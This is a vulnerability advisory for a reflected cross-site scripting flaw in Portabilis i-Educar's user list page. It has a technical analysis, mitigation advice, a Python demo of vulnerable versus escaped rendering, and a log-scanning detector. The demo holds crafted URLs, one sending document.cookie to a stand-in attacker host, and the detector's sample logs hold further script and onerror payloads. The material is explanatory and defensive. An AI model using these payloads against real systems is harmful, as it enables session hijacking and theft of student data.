
CVE-2025-8785: Cross Site Scripting in Portabilis i-Educar

Medium
Published: Sat Aug 09 2025 (08/09/2025, 23:32:06 UTC)
Source: CVE Database V5
Vendor/Project: Portabilis
Product: i-Educar

Description

A vulnerability, which was classified as problematic, has been found in Portabilis i-Educar up to 2.9. This issue affects some unknown processing of the file /intranet/educar_usuario_lst.php. The manipulation of the argument nm_pessoa/matricula/matricula_interna leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AI-Powered Analysis

Last updated: 08/10/2025, 00:02:44 UTC

Technical Analysis

CVE-2025-8785 is a cross-site scripting (XSS) vulnerability in Portabilis i-Educar, versions up to and including 2.9 (the record gives no lower bound). The script /intranet/educar_usuario_lst.php, a user list and search page of the intranet module, takes the request parameters nm_pessoa, matricula and matricula_interna and places their values in the HTML response without neutralising markup, so a value containing a quote and angle brackets, or an on* event-handler attribute, becomes part of the page instead of data. The attacker needs no account on the instance: it is enough to get a victim, usually a logged-in staff user of the intranet module, to open a crafted link, after which the injected script runs in the victim's browser under the origin of the i-Educar instance. It can then read the pages that user can see, submit requests within that user's session, deface the page or redirect the user; the session cookie itself is readable by the script only if it lacks the HttpOnly flag. The attack is launched remotely and requires user interaction. VulDB rates it at CVSS 4.0 base score 5.1 (medium), reflecting limited confidentiality and integrity impact and no availability impact. A proof of concept has been published (the record states the exploit has been disclosed), but no exploitation in the wild has been reported. The vendor was contacted ahead of disclosure and has not responded, and no fixed version is available. i-Educar is an open-source school management system used by educational institutions, primarily Brazilian municipal school networks, to manage student records and administrative tasks.
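The following Python is an added illustration of the mechanism, not i-Educar code and not taken from the advisory. It models a list page that echoes its filter parameters back into an input's value attribute and renders the row three ways: raw, with only angle brackets escaped, and with attribute-context encoding. Only the path and the parameter names come from the record; the HTML layout, the function names and both crafted URLs are constructed. A small probe built on the standard-library HTMLParser tokenises the rendered markup the way a browser would and reports whether a script element or an on* handler attribute ended up in the document, which is what decides whether a payload executes.

```python
"""Reflected XSS mechanics for a list page that echoes its filter parameters.
Added illustration for this advisory; not i-Educar code. Only the path and the
parameter names (nm_pessoa, matricula, matricula_interna) come from the record;
the HTML shape, function names and crafted URLs are constructed."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

REFLECTED_PARAMS = ("nm_pessoa", "matricula", "matricula_interna")


def parse_query(url: str) -> dict:
    """First value of each reflected parameter present in the URL (percent-decoded)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: qs[k][0] for k in REFLECTED_PARAMS if k in qs}


def render_vulnerable(params: dict) -> str:
    """Hypothetical vulnerable rendering: raw values concatenated into markup."""
    cells = "".join(f'<td><input name="{k}" value="{v}"></td>' for k, v in params.items())
    return f"<tr>{cells}</tr>"


def render_angle_brackets_only(params: dict) -> str:
    """Common half-fix: escapes < > & but leaves quotes alone."""
    cells = "".join(
        f'<td><input name="{escape(k, quote=False)}" value="{escape(v, quote=False)}"></td>'
        for k, v in params.items()
    )
    return f"<tr>{cells}</tr>"


def render_hardened(params: dict) -> str:
    """Attribute-context encoding: quote=True also escapes " and ', so the
    value can never terminate the attribute it is placed in."""
    cells = "".join(
        f'<td><input name="{escape(k, quote=True)}" value="{escape(v, quote=True)}"></td>'
        for k, v in params.items()
    )
    return f"<tr>{cells}</tr>"


class InjectionProbe(HTMLParser):
    """Tokenises rendered HTML as a browser would and records whether a
    <script> element or an on* event-handler attribute appeared."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def injected(html: str) -> bool:
    """True when the rendered page contains attacker-controlled executable markup."""
    probe = InjectionProbe()
    probe.feed(html)
    return probe.script_tags > 0 or bool(probe.handlers)


BASE = "https://school.example/intranet/educar_usuario_lst.php"
# Constructed crafted links. The first closes the attribute and opens a <script>
# element; the second never uses < or > and relies on an event-handler attribute.
URL_SCRIPT_TAG = BASE + (
    "?nm_pessoa=%22%3E%3Cscript%3Edocument.location%3D%27https%3A%2F%2F"
    "attacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E&matricula=2024001"
)
URL_EVENT_HANDLER = BASE + "?nm_pessoa=%22%20autofocus%20onfocus%3Dalert(document.domain)%20x%3D%22"

if __name__ == "__main__":
    for url in (URL_SCRIPT_TAG, URL_EVENT_HANDLER):
        params = parse_query(url)
        for label, render in (("vulnerable", render_vulnerable),
                              ("angle-only", render_angle_brackets_only),
                              ("hardened", render_hardened)):
            print(f"{label:10} injected={injected(render(params))}")
```

The second URL is why quote escaping matters: it contains no angle brackets at all, so a fix that only strips or escapes < and > still lets it plant an onfocus handler. In PHP the hardened rendering corresponds to htmlspecialchars($value, ENT_QUOTES, 'UTF-8') (or the template engine's auto-escaping) at every point where the parameter is echoed.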

Potential Impact

For European organizations running Portabilis i-Educar, chiefly educational institutions, the vulnerability threatens the confidentiality and integrity of the data the platform holds. A staff member or administrator who opens a crafted link hands the attacker a foothold in their browser session: the injected script can read the student and user records visible to that account, submit changes or create users in that account's name, and, where the session cookie is not marked HttpOnly, exfiltrate the cookie for reuse from the attacker's own machine. The consequences are unauthorised access to the personal data of students, many of them minors, tampering with educational records, and reputational harm, with the breach-notification duties that GDPR attaches to exposed or altered personal data. Availability is not directly affected, although defacement or the incident response that follows a breach can disrupt operations. With no vendor response and no patch, the exposure persists until operators apply their own fix or compensating controls.

Mitigation Recommendations

Because i-Educar is open source, operators need not wait for the vendor. The definitive fix is output encoding wherever educar_usuario_lst.php echoes nm_pessoa, matricula and matricula_interna into the response: in PHP, htmlspecialchars with ENT_QUOTES and an explicit UTF-8 charset (or the template engine's auto-escaping), chosen for the HTML context the value lands in, since escaping angle brackets alone still leaves an attribute value open to an injected on* handler. Input validation is a second layer, not a substitute: matricula and matricula_interna are identifiers and can be restricted to the expected character set, but nm_pessoa is a person's name and cannot be. Until the code is patched, compensating controls reduce the impact. Set HttpOnly on the session cookie so an injected script cannot read it; the script can still act within the victim's session, so this limits cookie theft rather than the attack itself. Deploy a Content-Security-Policy without 'unsafe-inline' for scripts, which blocks the usual inline payload even while the reflection remains. Add WAF rules that reject angle brackets, event-handler attributes and javascript: URLs in these three parameters, treating them as a tripwire rather than a fix, since signature matching is bypassable. Restrict /intranet/ to trusted networks or a VPN, which limits who can be targeted but does not protect users already inside that network. Monitor access logs for requests to /intranet/educar_usuario_lst.php whose watched parameters contain markup after URL decoding, including double-encoded values, and remind staff that links to the platform arriving by e-mail or chat deserve suspicion. Keep tested backups of the database to recover from tampering, and watch the project's repository and community for an upstream fix while pressing the vendor for one.
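As an added example of the log-monitoring step (not part of i-Educar or the advisory), the Python below scans web-server access-log lines in the combined log format and flags requests to the advisory's path whose nm_pessoa, matricula or matricula_interna values contain markup once percent-encoding has been undone, including values that were encoded twice to slip past a naive filter. The log lines are constructed for the demo and use documentation IP ranges; the path and parameter names are the ones from the record.

```python
"""Flag XSS attempts against /intranet/educar_usuario_lst.php in access logs.
Added example for this advisory, not i-Educar code. The log lines below are
constructed (Apache/nginx combined log format, documentation IP ranges)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/intranet/educar_usuario_lst.php"
WATCHED_PARAMS = ("nm_pessoa", "matricula", "matricula_interna")

# Markup where a name or enrolment number is expected: raw angle brackets,
# javascript: URLs, on* event handlers, HTML character references.
XSS_MARKERS = re.compile(r"<|>|javascript:|\bon[a-z]+\s*=|&#x?[0-9a-f]+;", re.IGNORECASE)

# Combined log format: ip ident user [time] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %253C is caught as well as %3C."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(line: str):
    """Return (ip, timestamp, {param: decoded value}) when a request to the
    target path carries markup in a watched parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path != TARGET_PATH:
        return None
    hits = {}
    # parse_qs already strips one layer of encoding; fully_decode handles the rest.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            decoded = fully_decode(value)
            if XSS_MARKERS.search(decoded):
                hits[name] = decoded
    return (m["ip"], m["ts"], hits) if hits else None


def scan(lines):
    """All suspicious requests in the given log lines, in log order."""
    return [hit for hit in map(inspect_request, lines) if hit]


SAMPLE_LOG = [
    # benign search with an accented name: must not alert
    '192.0.2.10 - - [10/Aug/2025:01:10:41 +0000] "GET /intranet/educar_usuario_lst.php?nm_pessoa=Jo%C3%A3o%20Silva&matricula=2024001 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    # plain reflected payload in nm_pessoa
    '203.0.113.7 - - [10/Aug/2025:01:12:03 +0000] "GET /intranet/educar_usuario_lst.php?nm_pessoa=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5240 "-" "Mozilla/5.0"',
    # double-encoded event-handler payload in matricula_interna
    '198.51.100.23 - - [10/Aug/2025:01:12:45 +0000] "GET /intranet/educar_usuario_lst.php?matricula_interna=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5198 "-" "curl/8.5.0"',
    # same payload against another path: outside this check's scope
    '203.0.113.7 - - [10/Aug/2025:01:13:10 +0000] "GET /index.php?nm_pessoa=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, hits in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {hits}")
```

Access logs only show GET query strings; if the list page is driven by a POST form, the body is not logged and the same check has to run at the application or WAF layer. Dropping the TARGET_PATH comparison extends the check to every script that echoes these parameters, at the cost of more noise.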


Technical Details

Data Version
5.1
Assigner Short Name
VulDB
Date Reserved
2025-08-09T05:11:17.292Z
Cvss Version
4.0
State
PUBLISHED

Threat ID: 6897de23ad5a09ad000f1481

Added to database: 8/9/2025, 11:47:47 PM

Last enriched: 8/10/2025, 12:02:44 AM

Last updated: 8/10/2025, 8:24:28 AM


